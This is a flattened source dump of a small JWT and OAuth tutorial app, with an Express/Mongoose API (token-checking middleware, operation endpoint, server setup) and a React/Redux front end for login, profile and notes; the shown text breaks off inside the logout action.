| 12 | if (header) { 13 | try { 14 | const token = header.split(' ') 15 | const userToken = jwt.verify(token[1], SECURITY_SECRET) 16 | let user = await User.findOne({ _id: userToken.id }) 17 | 18 | if (user) { 19 | request.auth = { 20 | isAuthenticated: true, 21 | user, 22 | } 23 | } 24 | } catch (e) { 25 | console.warn('Invalid token detected.') 26 | } 27 | } else { 28 | request.auth = { 29 | isAuthenticated: false, 30 | user: null, 31 | } 32 | } 33 | 34 | next() 35 | } 36 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/database.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import mongoose from 'mongoose' 3 | 4 | // App Imports 5 | import { ENV, DATABASE_URL } from 'setup/config/env' 6 | 7 | // Connect database 8 | export async function connect() { 9 | console.info('SETUP - Connecting database..') 10 | 11 | await connectWithRetry() 12 | } 13 | 14 | // Disconnect database 15 | export async function close() { 16 | console.info('INFO - Disconnecting database..') 17 | 18 | return await mongoose.connection.close() 19 | } 20 | 21 | // Drop database 22 | export async function drop() { 23 | if (ENV === 'development') { 24 | console.info('INFO - Dropping database..') 25 | 26 | return await mongoose.connection.dropDatabase() 27 | } 28 | } 29 | 30 | // Handle connection error 31 | mongoose.connection.on('error', (error) => { 32 | console.log(`ERROR - Connection failed: ${error.message}`) 33 | 34 | setTimeout(async () => { 35 | console.log('SETUP - Connecting database.. retrying..') 36 | 37 | await connectWithRetry() 38 | }, 5000) 39 | }) 40 | 41 | // Retry connection 42 | const connectWithRetry = async () => { 43 | return await mongoose.connect(DATABASE_URL) 44 | } 45 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/endpoint.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import { ENV } from 'setup/config/env' 3 | import params from 'setup/config/params' 4 | import authentication from 'setup/server/authentication' 5 | import modules from './modules' 6 | 7 | // Setup endpoint 8 | export default function (server) { 9 | console.info('SETUP - Endpoint..') 10 | 11 | // API endpoint 12 | server.all( 13 | params.common.endpoint.url, 14 | [authentication], 15 | async (request, response) => { 16 | let result = { 17 | success: false, 18 | message: 'Please try again.', 19 | code: 'default', 20 | data: null, 21 | } 22 | 23 | // Check if operation to be called is set 24 | let operation = 25 | modules[request.body.operation] || modules[request.params.operation] 26 | 27 | if (operation) { 28 | try { 29 | // Execute operation 30 | // operationName({ params, fields, auth }) 31 | const { 32 | data, 33 | message = 'Success.', 34 | success = true, 35 | } = await operation({ 36 | params: request.body.params || request.query || {}, 37 | fields: request.body.fields || {}, 38 | auth: request.auth, 39 | }) 40 | 41 | // Operation executed successfully 42 | result.success = success 43 | result.data = data 44 | result.message = message 45 | } catch (error) { 46 | result.message = error.message 47 | result.code = error.code || 'default' 48 | } 49 | } else { 50 | result.message = `${request.body.operation} operation is not available.` 51 | } 52 | 53 | // Log info in development mode 54 | if (ENV === 'development') { 55 | console.log(request.body) 56 | console.log(result.success, result.message) 57 | } 58 | 59 | // Send response 60 | response.send(result) 61 | }, 62 | ) 63 | } 64 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/middlewares.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import path from 'path' 3 | import express from 'express' 4 | import cors from 'cors' 5 | import bodyParser from 'body-parser' 6 | import morgan from 'morgan' 7 | 8 | // App Imports 9 | import { ENV, URL_WEB } from 'setup/config/env' 10 | 11 | // Setup middlewares 12 | export default function (server) { 13 | console.info('SETUP - Middlewares..') 14 | 15 | // Enable CORS 16 | server.use( 17 | cors({ 18 | origin: [URL_WEB], 19 | }), 20 | ) 21 | 22 | // Request body parser 23 | server.use(bodyParser.json()) 24 | server.use(bodyParser.urlencoded({ extended: false })) 25 | 26 | // Static files folder 27 | server.use(express.static(path.join(__dirname, '..', '..', '..', 'public'))) 28 | 29 | // HTTP logger 30 | if (ENV === 'development') { 31 | server.use(morgan('tiny')) 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/modules.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import user from 'modules/user' 3 | import note from 'modules/note' 4 | 5 | // Modules 6 | export default { 7 | ...user, 8 | ...note, 9 | } 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/start.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import ip from 'ip' 3 | import mongoose from 'mongoose' 4 | 5 | // App imports 6 | import { PORT, ENV } from 'setup/config/env' 7 | 8 | // Start server 9 | export default async function (server) { 10 | console.info('SETUP - Starting server..') 11 | 12 | server.set('trust proxy', true) 13 | 14 | const serverProcess = server.listen(PORT, async (error) => { 15 | if (error) { 16 | console.error('ERROR - Unable to start server.') 17 | } else { 18 | console.info(`INFO - Server started on`) 19 | console.info(` Local http://localhost:${PORT} [${ENV}]`) 20 | console.info(` Network http://${ip.address()}:${PORT} [${ENV}]`) 21 | console.info(` Datetime ${new Date()}\n`) 22 | } 23 | }) 24 | 25 | serverProcess.setTimeout(500000) 26 | 27 | // Stop Server 28 | for (let signal of ['SIGINT', 'SIGTERM']) { 29 | process.on(signal, async () => { 30 | console.info('INFO - Shutting down server..') 31 | 32 | serverProcess.close(async () => { 33 | console.info('INFO - Server has been shut down.') 34 | 35 | mongoose.connection.close(false, async () => { 36 | console.info('INFO - Database disconnected.') 37 | process.exit(0) 38 | }) 39 | }) 40 | }) 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/jsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "baseUrl": "src" 4 | }, 5 | "include": ["src"] 6 | } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "web", 3 | "version": "0.1.0", 4 | "private": true, 5 | "dependencies": { 6 | "@testing-library/jest-dom": "^5.16.4", 7 | "@testing-library/react": "^12.1.3", 8 | "@testing-library/user-event": "^13.5.0", 9 | "axios": "^0.27.2", 10 | "lodash": "^4.17.21", 11 | "moment": "^2.29.3", 12 | "query-string": "^7.1.1", 13 | "react": "^17.0.2", 14 | "react-dom": "^17.0.2", 15 | "react-helmet": "^6.1.0", 16 | "react-redux": "^7.2.6", 17 | "react-router-dom": "^5.2.0", 18 | "react-scripts": "5.0.1", 19 | "redux": "^4.2.0", 20 | "redux-thunk": "^2.4.1" 21 | }, 22 | "devDependencies": { 23 | "husky": "^4.3.6", 24 | "prettier": "2.6.2", 25 | "pretty-quick": "^3.1.3" 26 | }, 27 | "scripts": { 28 | "start": "react-scripts start", 29 | "build": "react-scripts build", 30 | "test": "react-scripts test", 31 | "eject": "react-scripts eject" 32 | }, 33 | "husky": { 34 | "hooks": { 35 | "pre-commit": "pretty-quick --staged" 36 | } 37 | }, 38 | "eslintConfig": { 39 | "extends": "react-app" 40 | }, 41 | "browserslist": { 42 | "production": [ 43 | ">0.2%", 44 | "not dead", 45 | "not op_mini all" 46 | ], 47 | "development": [ 48 | "last 1 chrome version", 49 | "last 1 firefox version", 50 | "last 1 safari version" 51 | ] 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/favicon.ico -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/loader.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/images/loader.gif -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/other/shopify.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/other/spotify.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/images/preview.png -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/discord.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/facebook.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/google.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/linkedin.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/reddit.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/twitter.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | 8 | 9 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/azure.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/bitbucket.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/digitalocean.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/github.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/gitlab.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 12 | 13 | 17 | 18 | 27 | OAuth 28 | 29 | 30 | 31 |
32 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/logo192.png -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/logo512.png -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import ReactDOM from 'react-dom' 4 | import { Provider as StateProvider } from 'react-redux' 5 | import { BrowserRouter as Router, Route, Switch } from 'react-router-dom' 6 | 7 | // UI imports 8 | import 'ui/common/colors.css' 9 | import 'ui/common/reset.css' 10 | 11 | // App imports 12 | import { store } from 'setup/store' 13 | import routes from 'setup/routes' 14 | import Layout from 'modules/common/Layout' 15 | import RoutePrivate from 'modules/common/RoutePrivate' 16 | import { 17 | loginSetUserLocalStorage, 18 | loginSetUser, 19 | } from 'modules/user/api/actions/query' 20 | import * as serviceWorker from './serviceWorker' 21 | 22 | // User Authentication 23 | const token = window.localStorage.getItem('token') 24 | if (token && token !== 'undefined' && token !== '') { 25 | const user = JSON.parse(window.localStorage.getItem('user')) 26 | if (user) { 27 | loginSetUserLocalStorage(token, user) 28 | store.dispatch(loginSetUser(token, user)) 29 | } 30 | } 31 | 32 | ReactDOM.render( 33 | 34 | 35 | 36 | 37 | {Object.values(routes).map((route, index) => 38 | route.auth ? ( 39 | 40 | ) : ( 41 | 42 | ), 43 | )} 44 | 45 | 46 | 47 | , 48 | document.getElementById('root'), 49 | ) 50 | 51 | serviceWorker.unregister() 52 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/AuthCheck/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Redirect } from 'react-router-dom' 4 | import { useSelector } from 'react-redux' 5 | 6 | // App Imports 7 | import routes from 'setup/routes' 8 | 9 | // Component 10 | const AuthCheck = () => { 11 | const { isAuthenticated } = useSelector((state) => state.auth) 12 | 13 | return isAuthenticated ? : '' 14 | } 15 | 16 | export default AuthCheck 17 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Footer/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // App imports 8 | import params from 'setup/config/params' 9 | 10 | // Component 11 | const Footer = () => { 12 | // render 13 | return ( 14 | 20 | ) 21 | } 22 | 23 | export default Footer 24 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Footer/style.css: -------------------------------------------------------------------------------- 1 | .common-footer { 2 | display: flex; 3 | flex-direction: row; 4 | border-top: 1px solid #cccccc; 5 | padding: 1.5rem 2rem; 6 | } 7 | .common-footer > a { 8 | margin-left: 0.5rem; 9 | } 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Header/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Link, NavLink } from 'react-router-dom' 4 | import { useSelector } from 'react-redux' 5 | 6 | // UI imports 7 | import './style.css' 8 | 9 | // App imports 10 | import params from 'setup/config/params' 11 | import routes from 'setup/routes' 12 | 13 | // Component 14 | const Header = () => { 15 | // state 16 | const { user } = useSelector((state) => state.auth) 17 | 18 | // render 19 | return ( 20 |
21 | 27 | 28 | 43 |
44 | ) 45 | } 46 | 47 | export default Header 48 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Header/style.css: -------------------------------------------------------------------------------- 1 | .common-header { 2 | display: flex; 3 | flex-direction: column; 4 | } 5 | .common-header > .brand { 6 | display: flex; 7 | flex-direction: column; 8 | border-bottom: 1px solid #cccccc; 9 | padding: 1.5rem 2rem; 10 | } 11 | 12 | .common-header > .brand > h5 { 13 | margin-top: 0.5rem; 14 | color: #666666; 15 | } 16 | 17 | .common-header > .menu { 18 | display: flex; 19 | flex-direction: row; 20 | border-bottom: 1px solid #cccccc; 21 | padding: 0 1rem; 22 | } 23 | 24 | .common-header > .menu > a { 25 | text-transform: uppercase; 26 | font-weight: bold; 27 | padding: 0.5rem 1rem; 28 | } 29 | .common-header > .menu > a.active { 30 | color: var(--primary); 31 | } 32 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Layout/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // App imports 8 | import Header from 'modules/common/Header' 9 | import Footer from 'modules/common/Footer' 10 | 11 | // Component 12 | const Layout = ({ children }) => { 13 | // render 14 | return ( 15 |
16 | {/* header */} 17 |
18 | 19 | {/* content */} 20 |
{children}
21 | 22 | {/* footer */} 23 |
24 |
25 | ) 26 | } 27 | 28 | export default Layout 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Layout/style.css: -------------------------------------------------------------------------------- 1 | .common-layout { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .common-layout > main { 8 | display: flex; 9 | flex-direction: column; 10 | flex: 1; 11 | padding: 1.5rem 2rem; 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/RoutePrivate/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Route, Redirect } from 'react-router-dom' 4 | import { useSelector } from 'react-redux' 5 | 6 | // App imports 7 | import routes from 'setup/routes' 8 | 9 | // Component 10 | const RoutePrivate = ({ role, component, ...props }) => { 11 | const { isAuthenticated } = useSelector((state) => state.auth) 12 | 13 | return isAuthenticated ? ( 14 | 15 | ) : ( 16 | 17 | ) 18 | } 19 | 20 | export default RoutePrivate 21 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/List/style.css: -------------------------------------------------------------------------------- 1 | .note-list { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | max-width: 30rem; 6 | } 7 | 8 | .note-list > form { 9 | display: flex; 10 | flex-direction: column; 11 | background-color: var(--grey-light); 12 | padding: 1rem; 13 | } 14 | 15 | .note-list > aside { 16 | margin-top: 2rem; 17 | } 18 | 19 | .note-list > aside > .list { 20 | display: flex; 21 | flex-direction: column; 22 | margin-top: 0.5rem; 23 | } 24 | 25 | .note-list > aside > .list > .item { 26 | display: flex; 27 | flex-direction: column; 28 | border-bottom: 1px solid var(--grey); 29 | padding: 0.5rem 0; 30 | } 31 | .note-list > aside > .list > .item:last-child { 32 | border: none; 33 | } 34 | .note-list > aside > .list > .item > .info { 35 | font-size: 0.8rem; 36 | margin-top: 0.25rem; 37 | color: var(--grey-dark); 38 | } 39 | .note-list > aside > .list > .item > .info > span { 40 | cursor: pointer; 41 | } 42 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import save from './save' 3 | import remove from './remove' 4 | 5 | // Queries 6 | export { save, remove } 7 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/mutation/remove.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Remove 8 | export default function remove({ noteId }) { 9 | return axios.post(URL_API, { 10 | operation: 'noteRemove', 11 | params: { noteId }, 12 | }) 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/mutation/save.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Save 8 | export default function save(note) { 9 | return axios.post(URL_API, { 10 | operation: 'noteSave', 11 | params: note, 12 | }) 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/query/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import list from './list' 3 | 4 | // Queries 5 | export { list } 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/note/api/actions/query/list.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Get list 8 | export default function list() { 9 | return axios.post(URL_API, { 10 | operation: 'noteList', 11 | }) 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/pages/Authorize/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React, { useEffect } from 'react' 3 | import { Helmet } from 'react-helmet' 4 | import { useDispatch } from 'react-redux' 5 | import * as queryString from 'query-string' 6 | 7 | // UI imports 8 | import './style.css' 9 | 10 | // App imports 11 | import { URL_WEB } from 'setup/config/env' 12 | import params from 'setup/config/params' 13 | import routes from 'setup/routes' 14 | import { 15 | loginSetUser, 16 | loginSetUserLocalStorage, 17 | } from 'modules/user/api/actions/query' 18 | import { authorize } from 'modules/user/api/actions/mutation' 19 | 20 | // Component 21 | const Authorize = ({ history, location }) => { 22 | // state 23 | const dispatch = useDispatch() 24 | 25 | // on load 26 | useEffect(() => { 27 | process() 28 | }, []) 29 | 30 | // process 31 | const process = async () => { 32 | const query = queryString.parse(location.search) 33 | 34 | if (query.code && query.state) { 35 | let redirectTo = routes.pagesHome.path 36 | 37 | try { 38 | const { data } = await authorize(query) 39 | 40 | if (data && data.success && data.data) { 41 | const token = data.data.token 42 | const user = data.data.user 43 | 44 | dispatch(loginSetUser(token, user)) 45 | 46 | loginSetUserLocalStorage(token, user) 47 | 48 | redirectTo = routes.userDashboard.path 49 | } 50 | } catch (error) { 51 | // console.log(error) 52 | } finally { 53 | history.push(redirectTo) 54 | } 55 | } else { 56 | history.push(routes.pagesHome.path) 57 | } 58 | } 59 | 60 | // render 61 | return ( 62 | <> 63 | {/* meta */} 64 | 65 | {`Authorizing... · ${params.site.name}`} 66 | 67 | 68 | {/* content */} 69 |
70 |

71 | loading...{' '} 72 | Authorizing... 73 |

74 |
75 | 76 | ) 77 | } 78 | 79 | export default Authorize 80 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/pages/Authorize/style.css: -------------------------------------------------------------------------------- 1 | .pages-authorize { 2 | display: flex; 3 | flex-direction: row; 4 | } 5 | 6 | .pages-authorize > p { 7 | display: flex; 8 | justify-content: center; 9 | align-items: center; 10 | color: var(--grey-dark); 11 | } 12 | .pages-authorize > p > img { 13 | margin-right: 0.5rem; 14 | } 15 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/pages/Home/style.css: -------------------------------------------------------------------------------- 1 | .pages-home { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .pages-home > .group { 8 | display: flex; 9 | flex-direction: row; 10 | margin-top: 1rem; 11 | } 12 | .pages-home > .group > section { 13 | display: flex; 14 | flex-direction: column; 15 | margin-right: 1rem; 16 | width: 12rem; 17 | } 18 | 19 | .pages-home > .group > section > h4 { 20 | margin-bottom: 1rem; 21 | } 22 | .pages-home > .group > section > a { 23 | display: block; 24 | margin-bottom: 1rem; 25 | } 26 | .pages-home > .group > section > a > button { 27 | width: 100%; 28 | } 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Dashboard/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Helmet } from 'react-helmet' 4 | import { useSelector } from 'react-redux' 5 | 6 | // UI imports 7 | import './style.css' 8 | 9 | // App imports 10 | import params from 'setup/config/params' 11 | 12 | // Component 13 | const Dashboard = () => { 14 | // state 15 | const { user } = useSelector((state) => state.auth) 16 | 17 | // render 18 | return ( 19 | <> 20 | {/* meta */} 21 | 22 | {`User Dashboard · ${params.site.name}`} 23 | 24 | 25 | {/* content */} 26 |
27 |

Welcome, {user && user.name}!

28 |
29 | 30 | ) 31 | } 32 | 33 | export default Dashboard 34 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Dashboard/style.css: -------------------------------------------------------------------------------- 1 | .user-dashboard { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .user-dashboard > aside { 8 | margin-top: 1rem; 9 | } 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Profile/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React, { useState, useEffect } from 'react' 3 | import { Helmet } from 'react-helmet' 4 | import { useDispatch } from 'react-redux' 5 | import moment from 'moment' 6 | 7 | // UI imports 8 | import Button from 'ui/Button' 9 | import './style.css' 10 | 11 | // App imports 12 | import params from 'setup/config/params' 13 | import { logout, profile } from 'modules/user/api/actions/query' 14 | 15 | // Component 16 | const Dashboard = () => { 17 | // state 18 | const [isLoading, isLoadingToggle] = useState(false) 19 | const [user, setUser] = useState(null) 20 | const dispatch = useDispatch() 21 | 22 | // on load 23 | useEffect(() => { 24 | refresh() 25 | }, []) 26 | 27 | // refresh 28 | const refresh = async () => { 29 | isLoadingToggle(true) 30 | 31 | try { 32 | const { data } = await profile() 33 | 34 | if (data.success && data.data) { 35 | setUser(data.data) 36 | } 37 | } catch (error) { 38 | console.log(error) 39 | } finally { 40 | isLoadingToggle(false) 41 | } 42 | } 43 | 44 | // on logout 45 | const onLogout = () => { 46 | let check = window.confirm('Are you sure you want to logout?') 47 | 48 | if (check) { 49 | dispatch(logout()) 50 | } 51 | } 52 | 53 | // render 54 | return ( 55 | <> 56 | {/* meta */} 57 | 58 | {`User Dashboard · ${params.site.name}`} 59 | 60 | 61 | {/* content */} 62 |
63 | {isLoading ? ( 64 |

Loading profile...

65 | ) : ( 66 | user && ( 67 | <> 68 |

69 | Name: {user.name} 70 |

71 |

72 | Email: {user.email} 73 |

74 |

75 | Registered:{' '} 76 | {moment(user.createdAt).format(params.common.date)} 77 |

78 | 79 | ) 80 | )} 81 | 82 | 85 |
86 | 87 | ) 88 | } 89 | 90 | export default Dashboard 91 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/Profile/style.css: -------------------------------------------------------------------------------- 1 | .user-dashboard { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .user-dashboard > p { 8 | margin-bottom: 0.5rem; 9 | } 10 | 11 | .user-dashboard > aside { 12 | margin-top: 1rem; 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/mutation/authorize.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App imports 5 | import { URL_API } from 'setup/config/env' 6 | 7 | // Authorize 8 | export default function authorize(query) { 9 | return axios.post(URL_API, { 10 | operation: 'userAuthorize', 11 | params: query, 12 | }) 13 | } 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/mutation/index.js: -------------------------------------------------------------------------------- 1 | // App imports 2 | import authorize from './authorize' 3 | 4 | // Queries 5 | export { authorize } 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/index.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import loginSetUser from './loginSetUser' 3 | import loginSetUserLocalStorage from './loginSetUserLocalStorage' 4 | import logout from './logout' 5 | import logoutUnsetUserLocalStorage from './logoutUnsetUserLocalStorage' 6 | import profile from './profile' 7 | 8 | // Queries 9 | export { 10 | loginSetUser, 11 | loginSetUserLocalStorage, 12 | logout, 13 | logoutUnsetUserLocalStorage, 14 | profile, 15 | } 16 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/loginSetUser.js: -------------------------------------------------------------------------------- 1 | // App Imports 2 | import { SET_USER } from 'modules/user/api/actions/types' 3 | 4 | // Emit set user event 5 | export default function loginSetUser(token, user) { 6 | return { type: SET_USER, user } 7 | } 8 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/loginSetUserLocalStorage.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // Set user token and info in localStorage and axios auth headers 5 | export default function loginSetUserLocalStorage(token, user) { 6 | if (token) { 7 | axios.defaults.headers.common['Authentication'] = `Bearer ${token}` 8 | } else { 9 | delete axios.defaults.headers.common['Authentication'] 10 | } 11 | 12 | // Update token 13 | window.localStorage.setItem('token', token) 14 | window.localStorage.setItem('user', JSON.stringify(user)) 15 | } 16 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/user/api/actions/query/logout.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import axios from 'axios' 3 | 4 | // App Imports 5 | import { LOGOUT } from 'modules/user/api/actions/types' 6 | import { logoutUnsetUserLocalStorage } from 'modules/user/api/actions/query' 7 | 8 | // Log out user and remove token from localStorage 9 | export default function logout() { 10 | return (dispatch) => { 11 | 